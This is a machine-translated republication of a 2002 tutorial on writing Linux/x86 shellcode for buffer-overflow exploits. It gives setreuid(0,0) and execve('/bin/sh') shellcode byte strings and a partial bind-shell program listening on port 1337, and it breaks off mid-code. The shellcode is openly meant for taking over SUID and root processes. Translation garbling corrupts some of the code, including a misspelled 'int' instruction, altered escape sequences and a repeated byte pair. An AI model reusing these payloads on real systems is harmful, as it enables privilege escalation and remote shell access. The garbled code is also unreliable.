Shellcodes Compiling Method

Last Update:2018-12-05 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

UNF & PR1 present: Writing Linux/x86 shellcodes for dum dums.

========================================================== =====
PR1 (pr10n@u-n-f.com)
ICBM@0x557.org
Thank you very much for pointing out and correcting the mistakes in the original text and translation, Thk u!
Http://www.0x557.org
Http://www.airarms.org
========================================================== =====

Bytes -----------------------------------------------------------------------------------------------
Copyright (c) February 2002, Sebastian hegenbart (a. k. a PR1) and UNF (United net frontier)
The following material is property of UNF & pr1.
Do not redistribute this article modified and give proper credit to UNF and PR1 if you
Redistribute it or if you write your own article based upon the following material.
Bytes -----------------------------------------------------------------------------------------------

1. Introduction

There are not many good articles on the Internet about How to Write shellcode. Unfortunately, reading them requires a wealth of compilation knowledge, so in this article, I will introduce you to Linux/x86 assembly and explain how to write shellcode for Linux/x86. However, the introduction to ASM in this article is incomplete. I just talked about some important parts in writing shellcode. I will explain the code that has appeared in the article, but nothing can replace a good ASM book and an anti-compiler. :)

1.2. What is shellcode?

In short, shellcode is a set of CPU commands. Why is it shellcode? Because the first shellcode is just a simple shell. In fact, this function is already very primitive :). Because a remote shellcode (UDP or TCP) already exists, the chroot shellcode is damaged, the shellcode that adds a line of information to the file, the shellcode of setreuid, and so on... because everyone calls it shellcode like this, I will use the word shellcode in the whole text.

1.3. What should we do with shellcode?

After we take over a process (SUID, SGID, and deamon run by root), we usually let it do something useful. There are many technologies such as return into libc, got overwrite addys, PLT infection, and exploiting. dtors... if you cannot execute other functions to complete the tasks you need (such as rewriting function pointers ,...) you may need to use shellcode. You may simply use some buffer addresses to rewrite % EIP, and then jump back to a group of NOPs commands. Your CPU will retrieve the forward address from % EIP that has been changed. when you have compiled a vulnerability attack program and entered shellcode in your input buffer, when % EIP points to the beginning of shellcode, it will be run. in this way, you win!

1.4 How do I write shellcode?

Now let's take a look at the main part of this article. I suppose you have at least some knowledge of C language.

=- =- ==- =-=
2. Assembly

ASM is a low-level programming language. It can even set the transistor state in your CPU. A IA-32 CPU has many registers that access these registers much faster than direct access to memory. You can assign a value to the Register to tell your program what to do. The most important registers are: % eax, % EBX, % ECx, % edX, % ESP, % ESI, % EIP, % EDI. All 32-bit CPU registers are 4 bytes long. You may think that these Register names are not creative, but you are wrong:

# % Eax is a accumulator. When a system call occurs, the kernel checks the value in % eax, which is used as the system call number (each system call provided by the kernel has its own system call number ). you can go to/usr/include/ASM/unistd. h.

# % EBX is the base address register. The first parameter we pass to the function is placed in this register.

# % ECx second parameter.

# % EdX third parameter.

# % ESP is a stack pointer register that points to the top of the current stack storage area.

# % EBP is the base register, which points to the bottom of the current stack storage area.

# % EIP is the instruction pointer (the register most useful to us in buffer overflow)

# % ESI and % EDI are segment registers (they can store user data in your shellcode)

2.1 modify registers:

There are many commands that can be used to modify registers. You can add a suffix to a command to modify a byte, a word, or the entire register.

For example: movl, movb, movw (long, byte, word)

# Mov... moV command is used to transmit a value to a register (number or the content of another register ...). in the at&t syntax (I will use this syntax throughout the article), the target operand is on the right and the original operand is on the left.

# Inc, dec... increase or decrease the register value.

# XOR... This is a bitwise operation (including not, or, and, XOR, and neg ).

XOR plays a special role when processing shellcode.
Here we will explain the basic operations of XOR:

1 exclusive or 0 is: 100 and 0 is: 0 and 1 is: 0, so XOR 100 is 0 (XOR = 000 );

# Leal... (indicates reading a long-type valid address) You can use this command to read a memory address to a register.

# Int $0x80 this is an interruption. It is simply used to switch to the kernel mode and then let the kernel execute our function.

# Push, Pop... read stored data on the stack.

Note: You can access high-byte or low-byte (% Al, % AH) in a register's low-end word, or the entire (extended) Register (% eax) in a register ). but there is no way to access the high-end word of a register.
Registers can be in bytes (% Al, % BH ,...), word Format (% ax, % BX ,...) and the entire method (% eax, % EBX ,...) access.

After preparing this knowledge, I can write some ASM code and then write some shellcode.

Let's start with a hello, world :) (there is no way to replace this)

. Data
Message:
. String "Hello, world/N"

. Globl main
Main:

# Write (int fd, char * message, ssize_t size );

Movl $0x4, % eax # put the system call 4 defined in/usr/include/ASM/unistd. h In % eax
Movl $0x1, % EBX # standard output file descriptor (stdout)
Movl $ message, % ECx # Put the Message Address in % ECx
Movl $ 0xc, % edX # message length

# Exit (INT returncode );

Movl $0x1, % eax # system call number 1
Xorl % EBX, % EBX # % EBX 0
INR $0x80

Note: This code segment cannot be used as shellcode for two reasons:
1. It is not an absolute address (because a data segment is defined)
2. Because the string contains zero characters, general operations on the string will be interrupted.

Don't worry! Now I will explain the whole process of making shellcode.

=- =- ==- =-=

3. Write shellcode

3.1 setreuid shellcode:

Let's start with the small and simple shellcode setreuid (0, 0.
If the program removes the privilege (usually using a seteuid (getuid () before executing a function with a vulnerability, we need a setreuid or a seteuid shellcode.

The C code looks like this:

# Include <stdio. h>

Main (void ){

Setreuid (0, 0 );
Exit (0 );
}

080483b0 <main>:
80483b0: B8 46 00 00 00 movl $0x46, % eax
80483b5: BB 00 00 00 00 movl $0x0, % EBX
80483ba: B9 00 00 00 00 movl $0x0, % ECx
80483bf: CD 80 int $0x80
80483c1: 8d 76 00 Lea 0x0 (% Esi), % ESI
80483c4: 90 NOP
80483c5: 90 NOP
80483c6: 90 NOP
80483c7: 90 NOP
80483c8: 90 NOP
80483c9: 90 NOP
80483ca: 90 NOP
80483cb: 90 NOP
80483cc: 90 NOP
80483cd: 90 NOP
80483ce: 90 NOP
80483cf: 90 NOP

This is the entire main function generated by our compiler, but we only need the setreuid segment:

80483b0: B8 46 00 00 00 movl $0x46, % eax
80483b5: BB 00 00 00 00 movl $0x0, % EBX
80483ba: B9 00 00 00 00 movl $0x0, % ECx
80483bf: CD 80 int $0x80

Therefore, setreuid shellcode is like this:

"/Xb8/X46/x00/x00/x00"
"/Xbb/x00/x00/x00/x00"
"/Xb9/x00/x00/x00/x00"
"/XCD/X80"

If you read the shellcode above, you may notice that there are more NULL bytes (/x00) than instructions. Unfortunately, we cannot use any null in shellcode. Because we usually need to overflow the C program, but there is no string data type in the C language. Instead, a long byte pointer (char *) is used to point to a byte in the memory, and a null value appears at the end of the string. Functions such as strcpy and strcat operate on strings, but when the first null is encountered, the copy will be stopped, so that they think that null is the end of the string.

Therefore, when we overflow a program, only "/xb8/X46/" will be copied from our setreuid shellcode.

What we need to do now is to rewrite our assembly code so that there is no Null Byte in our shellcode. As you can see, this is a function that contains NULL:

80483b0: B8 46 00 00 00 movl $0x46, % eax
80483b5: BB 00 00 00 00 movl $0x0, % EBX
80483ba: B9 00 00 00 00 movl $0x0, % ECx

We must find the equivalent command that does not generate NULL bytes:

80483b0: B8 46 00 00 00 movl $0x46, % eax

This command is encoded as [opcode | destination] [4 byte immediate value]. Because our immediate number is only 0x46, and other bytes in the operation type long are not used.

We can write it as follows:

80483c6: 31 C0 xorl % eax, % eax
80483c8: B0 46 movb $0x46, % Al

Xorl clears % eax, because we cannot determine whether % eax is null when we change the 8-bit low. If the registers are not cleared, the kernel may execute an incorrect system call when % Ah has other values. The movb command is encoded in the [opcode | register] [1 byte immediate value] format. Therefore, we can use up to 255 bytes.

The following are logically equivalent setreuid Codes Without NULL:

80483b0: 31 C0 xorl % eax, % eax
80483b2: 31 db xorl % EBX, % EBX
80483b4: 31 C9 xorl % ECx, % ECx
80483b6: B0 46 movb $0x46, % Al
80483b8: CD 80 int $0x80

Here is the shellcode we can work on:

"/X31/xc0"
"/X31/XDB"
"/X31/XDB"
"/Xb0/X46"
"/XCD/X80"

Except for null, a good shellcode should be as small as possible. The smaller the shellcode, the more NOPs it can put into the cache, which increases the chance of correctly returning the address in the guess.

3.2 making your shellcode Portable:

You may not know too much information about the remote system. Or you do not have sufficient permissions to find information on the remote system. Or you do not even have the permission to access the remote system. For these reasons, do not allow you to write shellcode for only one system. Therefore, do not use absolute addresses when writing shellcode. The data you need is just a small chance of a correct address. Generally, relative addresses are used to write shellcode.

E. g: We won't write it as JMP 0x80483b8, But we write it as JMP $ 0x1a.

3.3 get shell shellcode:

Use C to get a shell like this:

# Include <stdio. h>

Main (void ){
Char * name [2];

Name [0] = "/bin/sh ";
Name [1] = NULL;

Execve (name [0], name, null );
}

As you can see, we need a string ("/bin/sh") to let execve know what we want to run. However, we must find the relative address that references "/bin/sh.

If you have knowledge about intel architecture and general CPU architecture, you may know that the memory address of the next command to be executed is stored in % EIP, which is usually called PC or program counter. If the program calls a sub-function, the address of the command to be executed after the sub-function returns will be stored somewhere.

Some of the memory registers related to the address of the CPU can be stored as follows:

Jal Addy, Reg/* jump to Addy and store PC + 4 to Reg */
Jr reg/* Our subfunction returns the jump to the Addy stored in Reg */

For our intel CISC:

Call sub_func/* jump to the subfunction and press % EIP + 4 into the stack */
RET/* function jump back to the address stored on the stack */

We can say that the address of the next instruction is pushed into the stack by call.

Therefore, we can use the following tips:

Call some_offset/* call the address of the "/bin/sh" (PC + 4) pushed into the stack */
. String "/bin/sh"

Note that the string "/bin/sh" is in the. Text (or code) segment. The CPU should not execute this Code: "/bin/sh" (2f62696e2f7368) because it is only a string we need, we should let the CPU skip this code.

Let's look at a complete example of getting this string "/bin/sh" and avoiding executing this code "/bin/sh" (2f62696e2f7368.

. Globl main
Main:

JMP to_call
After_jmp:

The popl % ESI/* address is already in % ESI */

/* Exit */
Xorl % eax, % eax
Incl % eax
Int $0x80

To_call:
Call after_jmp)
. String "/bin/sh"

Let's jump to call to let it work, then return, pop the address from the stack, and exit.

Static char lnx_execve [] =

"/Xeb/x1d" // JMP 0x1d/* Get "/bin/sh" Address */
"/X5b" // popl % EBX/* output stack "/bin/sh" Address */
"/X31/xc0" // xorl % eax, % eax
"/X89/x5b/x08" // movl % EBX, 0x8 (% EBX)/* copy the address to % EBX + 0x8 */
"/X88/x43/x07" // movb % Al, 0x7 (% EBX)/* use null as the string Terminator */
"/X89/x43/x0c" // movl % eax, 0xc (% EBX)/* use null as the parameter Terminator */
"/X8d/x4b/x08" // Leal 0x8 (% EBX), % ECx/* read the address of "/bin/sh" to % ECx */
"/X8d/x53/x0c" // Leal 0xc (% EBX), % edX/* read null to % edX */
"/Xb0/x0b" // movb $ 0xb, % Al/* execute system call */
"/XCD/X80" // int $0x80
"/X31/xc0" // xorl % eax, % eax/* and then exit to avoid infinite loops */
"/X21/xd8" // andl % EBX, % eax
"/X40" // incl % eax
"/XCD/X80" // int $0x80
"/Xe8/xde/xFF" // call-0xde
"/Bin/sh ";

-= -= -=

4.0 more advanced shellcodes:

Taking into account remote overflow, we need other types of shellcode. We cannot obtain only one shell remotely. Therefore, our shellcode requires network capabilities. To bind a shell to a port, we can write as follows:

# Include <stdio. h>
# Include <stdlib. h>
# Include <sys/types. h>
# Include <sys/socket. h>
# Include <netinet/in. h>

Main (void ){
Char * exec [2];
Int FD, fd2;
Struct sockaddr_in Addy;

Addy. sin_addr.s_addr = inaddr_any;
Addy. sin_port = htons (1337 );
Addy. sin_family = af_inet;

Exec [0] = "/bin/sh ";
Exec [1] = "sh ";

FD = socket (af_inet, sock_stream, ipproto_tcp );

BIND (FD, & Addy, sizeof (struct sockaddr_in ));
Listen (FD, 1 );

Fd2 = accept (FD, null, 0 );

Dup2 (fd2, 0 );
Dup2 (fd2, 1 );
Dup2 (fd2, 2 );

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Shellcodes Compiling Method

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support